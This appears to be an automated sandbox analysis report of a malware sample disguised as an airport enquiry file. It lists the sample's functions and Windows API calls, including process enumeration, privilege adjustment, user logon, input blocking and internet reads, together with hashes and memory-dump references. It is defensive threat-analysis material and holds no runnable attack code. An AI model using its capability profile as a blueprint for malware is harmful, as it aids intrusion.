            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __itow__swprintf
            • String ID:
            • API String ID: 674341424-0
            • Opcode ID: 7e16691b8c8eed2be095dfc459e19925a41f0c12daea6a6a78be5d6cf758d0dc
            • Instruction ID: 346f7e93f9205c378e23c96f87cbefc9ac5e9cc44512273e5202ff5b604ad659
            • Opcode Fuzzy Hash: 7e16691b8c8eed2be095dfc459e19925a41f0c12daea6a6a78be5d6cf758d0dc
            • Instruction Fuzzy Hash: DB2288716083419FCB24EF64C885B6FB7E4EF88704F14491DF99A97291DB30EA05DB92
            Function 00CFF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
            Download Yara Rule
            APIs
            • CreateToolhelp32Snapshot.KERNEL32 ref: 00CFF151
            • Process32FirstW.KERNEL32(00000000,?), ref: 00CFF15F
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • Process32NextW.KERNEL32(00000000,?), ref: 00CFF21F
            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CFF22E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
            • String ID:
            • API String ID: 2576544623-0
            • Opcode ID: e1fde83ecc634a3bbf234d349ae9282ccd971a6b1b4f84104efe345a7ddc5f42
            • Instruction ID: bea6b43d4db552c650e21fa631ae8524b8b97196ce30a3996bce98ed7fbe0073
            • Opcode Fuzzy Hash: e1fde83ecc634a3bbf234d349ae9282ccd971a6b1b4f84104efe345a7ddc5f42
            • Instruction Fuzzy Hash: BC518C71504300AFD320EF20DC85AABB7E8EF94714F14492DF596972A1EB70EA09DB96
            Function 00CE40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CE40D1
            • _memset.LIBCMT ref: 00CE40F2
            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CE4144
            • CloseHandle.KERNEL32(00000000), ref: 00CE414D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseControlCreateDeviceFileHandle_memset
            • String ID:
            • API String ID: 1157408455-0
            • Opcode ID: 0719a95fb15de1e9108b0fdaeda5d6bef6227cd164cee11323653ea60ade6890
            • Instruction ID: 833650df1d78ad8ecaaff93414b622e4a1234c6eeb1cd19ef9fb08744fb5b783
            • Opcode Fuzzy Hash: 0719a95fb15de1e9108b0fdaeda5d6bef6227cd164cee11323653ea60ade6890
            • Instruction Fuzzy Hash: 361194759013287AD7309BA5AC4DFABBB7CEB45764F1041AAF908D7280D6744E808BA4
            Function 00CDEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
            Download Yara Rule
            APIs
            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CDEB19
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: lstrlen
            • String ID: ($|
            • API String ID: 1659193697-1631851259
            • Opcode ID: 187a195dae534a812103db0dd2a6721be2403712f6e3df3c904cf1a3a96c7e3c
            • Instruction ID: 4d0c60140b6e2d01342a8efcca1815fd63f1f0e8d3938ee4337555010ee75ee1
            • Opcode Fuzzy Hash: 187a195dae534a812103db0dd2a6721be2403712f6e3df3c904cf1a3a96c7e3c
            • Instruction Fuzzy Hash: 31323675A007059FCB28DF59C481A6AB7F0FF48320B15C56EE9AADB3A1E770E941CB44
            Function 00CF25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
            Download Yara Rule
            APIs
            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00CF26D5
            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CF270C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Internet$AvailableDataFileQueryRead
            • String ID:
            • API String ID: 599397726-0
            • Opcode ID: 319e2dbeb6665e23a42bfdba5b6ba3b2482b6a695479d6150fd295fcad78d697
            • Instruction ID: 92db91be47aaf5c73d7ae18da6e71b9230deda9dbb496b5e8acba257e0cb41a4
            • Opcode Fuzzy Hash: 319e2dbeb6665e23a42bfdba5b6ba3b2482b6a695479d6150fd295fcad78d697
            • Instruction Fuzzy Hash: 0741F67150030DBFEB60EF95CC85EBBB7BCEB40718F10406AFB15E6140EA719E41A666
            Function 00CEB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEB5AE
            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CEB608
            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CEB655
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$DiskFreeSpace
            • String ID:
            • API String ID: 1682464887-0
            • Opcode ID: c94b5de362325781a97a1c3d62f45a4d92a25b4ccaade5bd9b32924434795e44
            • Instruction ID: 238567b09b1281d5347f58f077609b5a0826c4156aa9f4747adf6ebfb2490acf
            • Opcode Fuzzy Hash: c94b5de362325781a97a1c3d62f45a4d92a25b4ccaade5bd9b32924434795e44
            • Instruction Fuzzy Hash: ED216035A00618EFCB04EFA5D880AFEBBB8FF48314F1480A9E905EB351DB31A915DB55
            Function 00CD8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD8D0D
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD8D3A
            • GetLastError.KERNEL32 ref: 00CD8D47
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
            • String ID:
            • API String ID: 1922334811-0
            • Opcode ID: 8df390ebb790c6c2bdc5a0fa078c1b5c86e899d1dcfe733d0378a41f7a32cb56
            • Instruction ID: c99de591ad733c5e3d476ce80d9075e45b9cfba27811894666efc17228b9399e
            • Opcode Fuzzy Hash: 8df390ebb790c6c2bdc5a0fa078c1b5c86e899d1dcfe733d0378a41f7a32cb56
            • Instruction Fuzzy Hash: F911BFB1414309AFE728DF54DC85E6BB7BDEB44714B20852EF55693741EB30BC408A20
            Function 00CE4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
            Download Yara Rule
            APIs
            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CE4C2C
            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CE4C43
            • FreeSid.ADVAPI32(?), ref: 00CE4C53
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AllocateCheckFreeInitializeMembershipToken
            • String ID:
            • API String ID: 3429775523-0
            • Opcode ID: 306d062bd02a4b5868af82e7277c22d92e010774f47113916fc560d6b703aa2b
            • Instruction ID: 4280965dfdf0d05c3a09f15d472f065cdbacdd0d63220ae9d58c4d6a6632aa20
            • Opcode Fuzzy Hash: 306d062bd02a4b5868af82e7277c22d92e010774f47113916fc560d6b703aa2b
            • Instruction Fuzzy Hash: 5BF04975A1130CBFDF04DFF0DC89BAEBBBCEF08201F1044A9A905E2681E6746A048B60
            Function 00C8E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b2626063dfc20c0c04a33736add737796f666ebaf18709c64c71406420292ce8
            • Instruction ID: 55fff33e6dc17285992e2c0352d9d502a0f08bad4838713ba644851066fe868c
            • Opcode Fuzzy Hash: b2626063dfc20c0c04a33736add737796f666ebaf18709c64c71406420292ce8
            • Instruction Fuzzy Hash: 6B22BE70A00216DFDB24EF54C484BAEB7F0FF49308F148169E866AB351E770AE81DB95
            Function 00CEC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 00CEC966
            • FindClose.KERNEL32(00000000), ref: 00CEC996
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID:
            • API String ID: 2295610775-0
            • Opcode ID: 69a1e1bdb6cde1db97efbc3a20bb30e6f81ac1393ef725ee73f825c665f80c4b
            • Instruction ID: 90bacfac2496df65c445c183b097eff28eb7bb74c00f2adac0ef612b63885896
            • Opcode Fuzzy Hash: 69a1e1bdb6cde1db97efbc3a20bb30e6f81ac1393ef725ee73f825c665f80c4b
            • Instruction Fuzzy Hash: B911A1326102009FD710EF29C885A2AF7E9FF84324F04851EF9AAD7391DB30AC01DB95
            Function 00CEA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CF977D,?,00D0FB84,?), ref: 00CEA302
            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CF977D,?,00D0FB84,?), ref: 00CEA314
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorFormatLastMessage
            • String ID:
            • API String ID: 3479602957-0
            • Opcode ID: 8a7aa38f57ff4502626f5123198422919d4b74b2f48fb9a2317a063df22244b0
            • Instruction ID: 2116e99dbed6ce2182b3be6004131b9376ec58f751b71201f4f84b62d8f6c991
            • Opcode Fuzzy Hash: 8a7aa38f57ff4502626f5123198422919d4b74b2f48fb9a2317a063df22244b0
            • Instruction Fuzzy Hash: 62F0823554532DABDB20AFA5CC48FEA776DFF08761F004266F918D6291D630E940CBB1
            Function 00CD8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
            Download Yara Rule
            APIs
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD8851), ref: 00CD8728
            • CloseHandle.KERNEL32(?,?,00CD8851), ref: 00CD873A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AdjustCloseHandlePrivilegesToken
            • String ID:
            • API String ID: 81990902-0
            • Opcode ID: 880379727a5edaab4c3dd5d68adcd8ffa8136dd234d665853f177b20294439b6
            • Instruction ID: 05b515a930b215ac76e235837a1be96650530409a3ea39ed003ddda21e41c4da
            • Opcode Fuzzy Hash: 880379727a5edaab4c3dd5d68adcd8ffa8136dd234d665853f177b20294439b6
            • Instruction Fuzzy Hash: 27E0BF75010611EEE7352B60EC05E7777A9EB04754B258429F966C0570DB616C90DB10
            Function 00CAA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CA8F97,?,?,?,00000001), ref: 00CAA39A
            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CAA3A3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 8128ccbb884019d29d92628b14791a20652ec7e0ce4d2ac2014e6d786b8a31e7
            • Instruction ID: 41c04fba83096621bbbd216ea53b6a7dd1f5c93dd2fc97a0ec00bf3b14434663
            • Opcode Fuzzy Hash: 8128ccbb884019d29d92628b14791a20652ec7e0ce4d2ac2014e6d786b8a31e7
            • Instruction Fuzzy Hash: F2B09231058308ABCA102B91EC09B883F68EB45AB2F504020F60DC4A60CBA254508AA1
            Function 00CAF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 70b6a18a3364060ea0bc331e03da43af5368f37fb988249d5567dec8d570bf2a
            • Instruction ID: 88fca77d2b935128eda1cfc7ba7201d097479bf173bb9b710f3942761a763bf7
            • Opcode Fuzzy Hash: 70b6a18a3364060ea0bc331e03da43af5368f37fb988249d5567dec8d570bf2a
            • Instruction Fuzzy Hash: CB323521D69F025DD7239635D932336A258AFB73D8F14D73BE829B5AA6EF38C5830110
            Function 00CB267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 192bc55613b87d403f92a6970f8248c9b81096689fd47d82499131c82a430c3e
            • Instruction ID: 17396cec3a38a0861212bd475e75c5d19e38597c7d5a3bf37617290cd4787b90
            • Opcode Fuzzy Hash: 192bc55613b87d403f92a6970f8248c9b81096689fd47d82499131c82a430c3e
            • Instruction Fuzzy Hash: CAB1FF20E2AF515DD32396398831336FA4CAFBB2D5F51D71BFC2AB4E22EB2185834141
            Function 00CE8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
            Download Yara Rule
            APIs
            • __time64.LIBCMT ref: 00CE8B25
              • Part of subcall function 00CA543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CE91F8,00000000,?,?,?,?,00CE93A9,00000000,?), ref: 00CA5443
              • Part of subcall function 00CA543A: __aulldiv.LIBCMT ref: 00CA5463
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Time$FileSystem__aulldiv__time64
            • String ID:
            • API String ID: 2893107130-0
            • Opcode ID: f5b9d6f50007009c7e4f90014ec854de2c039ec86f6fadbb77d8d38aebad5d9e
            • Instruction ID: 2ba59dcd7be95ad334f05f6d67d2133c8cca5a0f6f965e22ae88b5febfd8a7b8
            • Opcode Fuzzy Hash: f5b9d6f50007009c7e4f90014ec854de2c039ec86f6fadbb77d8d38aebad5d9e
            • Instruction Fuzzy Hash: CA21E4726356108FC729CF25D841A52B3E1EBA5321B288E6CD1F9CF2D0CA74B945CB94
            Function 00CF41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
            Download Yara Rule
            APIs
            • BlockInput.USER32(00000001), ref: 00CF4218
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BlockInput
            • String ID:
            • API String ID: 3456056419-0
            • Opcode ID: 3c62c53809bd3769f6bc6e501dbaf54252fbc2cf97c8312acab1948ed8fbb619
            • Instruction ID: d3ddaf8c2a1ae355953561567b5eea359384ace71fd5af7b1ea2757a8ab9a110
            • Opcode Fuzzy Hash: 3c62c53809bd3769f6bc6e501dbaf54252fbc2cf97c8312acab1948ed8fbb619
            • Instruction Fuzzy Hash: 3EE04F312402189FC714EF5AD844AABF7E8EF94760F05802AFD4AC7352DA71E840DBA1
            Function 00CE4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
            Download Yara Rule
            APIs
            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CE4EEC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: mouse_event
            • String ID:
            • API String ID: 2434400541-0
            • Opcode ID: f31960e22be2db53703bd0dde0da757fd817155b101ac75ef45ecccc1dd11be8
            • Instruction ID: 803809828143461573cff8764872c24552217c012657092a28fb03ac90ab1e1c
            • Opcode Fuzzy Hash: f31960e22be2db53703bd0dde0da757fd817155b101ac75ef45ecccc1dd11be8
            • Instruction Fuzzy Hash: C0D052A91607887AEC2C8B239C5FF778208F300782FE0428AB112CB5C2E8D06D50A030
            Function 00CD8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
            Download Yara Rule
            APIs
            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CD88D1), ref: 00CD8CB3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
